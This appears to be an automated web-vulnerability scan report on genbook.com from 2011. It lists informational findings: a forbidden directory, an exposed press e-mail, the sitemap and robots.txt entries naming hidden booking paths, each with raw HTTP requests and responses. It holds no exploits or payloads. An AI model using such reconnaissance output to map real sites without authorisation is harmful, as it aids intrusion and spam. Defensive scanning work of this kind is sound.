<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /bookings/images/on this server.</p><hr><address>Apache/2.2.3 (Red Hat) Server at www.genbook.com Port 80</address></body></html>
Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /bookings/images/

/bookings/images/ CONFIRMED

http://www.genbook.com/bookings/images/

Request

GET /bookings/images/ HTTP/1.1
Referer: http://www.genbook.com/bookings/images/booknow.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=yiybmdbkuia2.cb2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 26 Apr 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /bookings/images/on this server.</p><hr><address>Apache/2.2.3 (Red Hat) Server at www.genbook.com Port 80</address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html

/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html

http://www.genbook.com/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google..

Found E-mails

press@genbook.com

Request

GET /about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 03:06:31 GMT
ETag: "1f40055-4873-4a13ccb7e3bc0"
Accept-Ranges: bytes
Content-Length: 18547
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 00:59:15 GMT
X-UA-Compatible: IE=7
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <title>Genbook Customer Reviews Now Published to Google Places - Press Releases - Genbook</title> <link rel="stylesheet" type="text/css" media="all" href="/css/all.css" /> <!--[if lt IE 8]><link type="text/css" rel="stylesheet" href="/css/ie.css" /><![endif]--> <script type="text/javascript" src="/js/jquery-1.5.2.min.js"></script> <script type="text/javascript" src="/js/jquery-ui-1.8.11.min.js"></script> <script type="text/javascript" src="/js/cufon.js"></script> <script type="text/javascript" src="/js/cufon-fonts.js"></script> <script type="text/javaScript" src="/js/myap9.js"></script> <script type="text/javaScript" src="/js/partner.js"></script> <script type="text/javascript" src="/js/jquery.common.js"></script> </head> <body> <div class="hidden"> <a id="top"></a> <!-- Image Preloads --> <img src="/images/bg-login-form.png"/> </div> <!-- w1 --> <div class="w1"> <!-- header --> <div id="wrapper"> <!-- header --> <div id="header"> <p class="logo"><a href="/">Genbook</a></p> <!-- navigation-holder --> <div class="navigation-holder"> <!-- add-nav --> <ul class="add-nav"> <li><a class="sign-up" href="/manager/register"><span>Sign Up</span></a></li> <li><a class="log-in" href="#"><span>Log in</span></a> <div class="quick-login-form-holder"> <!-- login-form --> <form class="quick-login-form" method="post" action="/manager/login"> <fieldset> <input type="hidden" value="" name="os_destination" /> <label for="email">Email Address</label> <div class="text"> <input type="text" id="email" name="os_username" /> </div> <label for="password">Password</label> <div class="text"> <input type="password" id="password" name="os_password" /> </div> <!-- row --> <div class="row"> <input type="checkbox" id="check" class="check" value="true" name="os_cookie"/> <label for="check">Remember me on this computer </label> </div> <!-- row --> <div class="row"> <a href="/manager/forgotpassword">Forgot your password?</a> <input type="submit" class="submit" value="Sign In" /> </div> </fieldset> </form> </div> </li> </ul> <!-- nav --> <ul id="nav"> <li><a href="/how-it-works/">how&nbsp;it&nbsp;works</a></li> <li><a href="/features/">features</a></li> <li><a href="/pricing/">pricing</a></li> <li class="active"><a href="/about-genbook/">About</a></li> </ul> </div> </div> <!-- main-wrapper --> <div class="main-wrapper"> <!-- main --> <div id="main"> <div class="t"> <div class="b"> <!-- sidebar --> <div id="sidebar"> <div class="t"> <div class="b"> <h2 class="page-title">About</h2> <ul> <li><a href="/about-genbook/index.html"><span>Who is Genbook </span></a></li> <li><a href="/about-genbook/testimonials/"><span>Genbooker Testimonials</span></a></li> <li><a href="/about-genbook/news-product-reviews.html"><span>News &amp; Product Reviews</span></a></li> <li class="active"><a href="/about-genbook/press-releases/"><span>Press Releases</span></a></li> <li><a href="/about-genbook/partner-program.html"><span>Partner Program</span></a></li> <li><a href="/manager/contactus"><span>Contact Genbook</span></a></li> </ul> </div> </div> </div> <!-- content --> <div id="content" class="thin"> <div id="press-release"> <div class="title"> <h1>Genbook Customer Reviews<span>Now Published to Google Places</span></h1> </div> <div class="formatted release"> <p><strong>Major Enhancement Syndicates Local Business Reviews Across the Internet.</strong></p> <p><strong>SAN FRANCISCO - April 12, 2011 -</strong> Genbook, the leader in Hassle-Free Online Scheduling Software for small local businesses, today announced a major enhancement to its appointment scheduling application that will provide users (aka &ldquo;Genbookers&rdquo;) with more ways to simplify their lives and grow their businesses. After each appointment, Genbook automatically collects and publishes Reviews from actual and recent customers, who have scheduled their appointments online. Reviews are published to the Genbook Scheduling Webpage and now across the Internet to encourage new online appointments.</p> <p>&ldquo;Reviews are a great way to promote a business through the testimonials of their satisfied customers. Genbook optimizes all &ldquo;Genbook Customer Reviews&rdquo; for inclusion on Google Places and the other major search engines, ensuring our Genbookers are more likely to be found by new customers searching for their service online,&rdquo; said Rody Moore, CEO and Founder of Genbook.</p> <p>&ldquo;I love Genbook and my clients love it too! Genbook is the best receptionist ever. Automatically sends appointment reminders and requests to write Reviews of my service. And now, my Genbook Reviews are on Google Places!&rdquo; said Elke Von Freudenberg, the Model Brow Specialists, New York City.</p> <p>Genbook&rsquo;s Online Appointment Scheduling Software helps local businesses connect with existing customers and advertise their services to new customers searching on the Internet. </p> <p><strong>More Appointments, Less Hassles</strong></p> <p>Genbook provides sophisticated yet easy-to-use Online Appointment Scheduling Software for local businesses to help grow their revenues by turning website visitors into confirmed appointments. Genbook is the life-changing solution that frees businesses from the tiresome task of scheduling, and offers their customers the convenience of scheduling appointments online in real-time, 24x7.</p> <p><strong>The Leader in Online Appointment Scheduling Web Services </strong></p> <p>Genbook is the leading provider of Online Scheduling Software for Small Local Businesses in North America. Genbook&rsquo;s Hassle-Free Online Scheduling Software is used by hundreds of thousands of consumers and many thousands of small businesses to simplify their lives. Genbook has been recognized by many well-respected news outlets including The New York Times, Fortune Small Business, The Wall Street Journal, C|Net News, Information Week, CNN Money, and USA Today. Genbook was profiled in PCWorld Magazine&rsquo;s list of 52 Incredibly Useful Web Services as &ldquo;Top-Notch&rdquo; and &ldquo;Phenomenally Cool.&rdquo;</p> <p>Genbook, Inc. is a privately-held, venture capital-backed company headquartered in San Francisco, California. More information can be found at www.genbook.com. </p> <p>Press Contact: <a href="mailto:press@genbook.com">press@genbook.com</a>, +1 415 227-9903.</p> <p>Follow Genbook on <a href="http://twitter.com/genbookteam">Twitter</a> and Like Genbook on <a href="http://www.facebook.com/GENBOOK">Facebook</a>.</p> </div> </div> </div> </div> </div> </div> <!-- block-link --> <div class="block-link gap"> <div class="try-button-holder"><a href="/manager/register" class="try-button" title="Click here to find out how to try Genbook for FREE!">Try Genbook for FREE</a></div> <p>No Credit Card Required.</p> </div> </div> </div> <!-- start footer --> <div id="footer"> <p class="backtotop"><a href="#top" id="tothetop">Back to Top</a></p> <div class="footernav"> <div class="column small"> <h3><a href="/how-it-works/">How It Works</a></h3> <ul> <li><a href="/how-it-works/">Overview</a></li> <li><a href="/how-it-works/benefits.html">Benefits of Genbook</a></li> <li><a href="/how-it-works/tutorial-videos.html">Tutorial Videos</a></li> </ul> <ul> <li class="link"><a href="/manager/register">Sign Up</a></li> <li class="link"><a href="#" id="footer_login">Login</a></li> <li class="link"><a href="http://genbook.blogspot.com/">Support Blog</a></li> <li class="link"><a href="/legal/">Legal</a></li> <li class="link"><a href="/sitemap.html">Site Map</a></li> </ul> </div> <div class="column double"> <h3><a href="/how-it-works/who-uses-genbook/">Who Uses Genbook</a></h3> <ul> <li><a href="/how-it-works/who-uses-genbook/massage.html">Massage</a></li> <li><a href="/how-it-works/who-uses-genbook/salon.html">Salon</a></li> <li><a href="/how-it-works/who-uses-genbook/spa.html">Spa</a></li> <li><a href="/how-it-works/who-uses-genbook/wellness.html">Wellness</a></li> <li><a href="/how-it-works/who-uses-genbook/skin.html">Skin</a></li> <li><a href="/how-it-works/who-uses-genbook/acupuncture.html">Acupuncture</a></li> <li><a href="/how-it-works/who-uses-genbook/chiropractors.html">Chiropractors</a></li> </ul> <ul> <li><a href="/how-it-works/who-uses-genbook/counseling.html">Counseling</a></li> <li><a href="/how-it-works/who-uses-genbook/consulting.html">Consulting</a></li> <li><a href="/how-it-works/who-uses-genbook/financial.html">Financial</a></li> <li><a href="/how-it-works/who-uses-genbook/photography.html">Photography</a></li> <li><a href="/how-it-works/who-uses-genbook/medical.html">Medical</a></li> <li><a href="/how-it-works/who-uses-genbook/financial.html">Law</a></li> <li><a href="/how-it-works/who-uses-genbook/more.html">Many More</a></li> </ul> </div> <div class="column wide"> <h3><a href="/features/">Features</a></h3> <ul> <li><a href="/features/#hasslefree">Hassle-Free Online Scheduling</a></li> <li><a href="/features/#anywhereanytime">Genbook Anywhere Anytime</a></li> <li><a href="/features/#connect">Connect With Your Customers</a></li> <li><a href="/features/#customize">Customize Your Genbook</a></li> <li><a href="/features/#trusted">Trusted, Secure, Guaranteed</a></li> </ul> <h3><a href="/pricing/">Pricing</a></h3> </div> <div class="column small"> <h3><a href="/about-genbook/">About</a></h3> <ul> <li><a href="/about-genbook/">Who is Genbook</a></li> <li><a href="/about-genbook/testimonials/">Genbooker Testimonials</a></li> <li><a href="/about-genbook/news-product-reviews.html">News &amp; Product Reviews</a></li> <li><a href="/about-genbook/press-releases/">Press Releases</a></li> <li><a href="/about-genbook/partner-program.html">Partner Program</a></li> <li><a href="/manager/contactus">Contact Genbook</a></li> </ul> </div> </div> <div class="social"> <!-- social --> <ul> <li class="facebook"><a href="http://www.facebook.com/Genbook" rel="external">Like</a></li> <li class="twitter"><a href="http://twitter.com/GenbookTeam" rel="external">Follow</a></li> ..
Sitemap Identified

Sitemap Identified
1 TOTAL
INFORMATION
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.

Impact

This issue is reported as extra information, there is no direct impact resulting from this.
- /sitemap.xml

/sitemap.xml

http://www.genbook.com/sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:58:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 03:06:31 GMT
ETag: "1f4014c-355f42-4a13ccb7e3bc0"
Accept-Ranges: bytes
Content-Length: 3497794
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 00:58:49 GMT
X-UA-Compatible: IE=7
Content-Type: text/xml


<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url><loc>http://www.genbook.com</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/index.html</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/manager/register</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/sitemap.html</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/manager/contactus</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/news-product-reviews.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/partner-program.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-launches-booknow-facebook-application.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-launches-genbook-mobile-optimized-for-the-iphone.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-makes-pcworld-magazines-list-of-incredibly-useful-sites.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-releases-multiple-calendar-view-feature.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-schedules-the-coupon-wielding-hordes.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/online-appointment-scheduling-is-a-competitive-necessity.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-2.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-3.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-4.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-5.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-6.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-7.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/features/daily-deal-ready.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/features/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/benefits.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/tutorial-videos.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/acupuncture.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/chiropractors.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/consulting.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/counseling.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/financial.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/massage.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/medical.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/more.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/photography.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/salon.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/skin.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/spa.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/wellness.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/legal/consumer.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/legal/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/legal/privacy.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/pricing/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/pricing/details.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011683</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011798</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012076</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011204</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011208</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011213</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011296</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011392</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011398</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011415</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011876</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012166</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012149</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010918</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010843</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010845</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010846</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010864</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011434</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011920</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011922</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012112</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010716</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011437</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011628</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011632</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011890</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010900</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010944</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010962</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011366</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011499</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011893</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011994</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011821</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012013</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011087</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011124</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011511</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011505</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011553</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011852</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/141498</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/152407</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/182796</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011550</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011895</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011945</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/276569</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011179</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011568</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011529</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010661</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010889</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011526</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011565</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011726</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/..
Robots.txt Identified

Robots.txt Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.

Remedy

  • If disallowed paths are sensitive, do not write them in the robots.txt and ensure that they correctly protected by means of authentication.
- /robots.txt

/robots.txt CONFIRMED

http://www.genbook.com/robots.txt

Interesting Robots.txt Entries

  • Sitemap: http://www.genbook.com/sitemap.xmlUser-agent: *Disallow: /bookings/slot/reservation/*?*method=putDisallow: /bookings/slot/reservation/30071103/39929633Disallow: /bookings/slot/reservation/30071103/39929633/*

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 03:06:31 GMT
ETag: "1f40043-de-4a13ccb7e3bc0"
Accept-Ranges: bytes
Content-Length: 222
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 00:59:00 GMT
X-UA-Compatible: IE=7
Content-Type: text/plain; charset=UTF-8


Sitemap: http://www.genbook.com/sitemap.xmlUser-agent: *Disallow: /bookings/slot/reservation/*?*method=putDisallow: /bookings/slot/reservation/30071103/39929633Disallow: /bookings/slot/reservation/30071103/39929633/*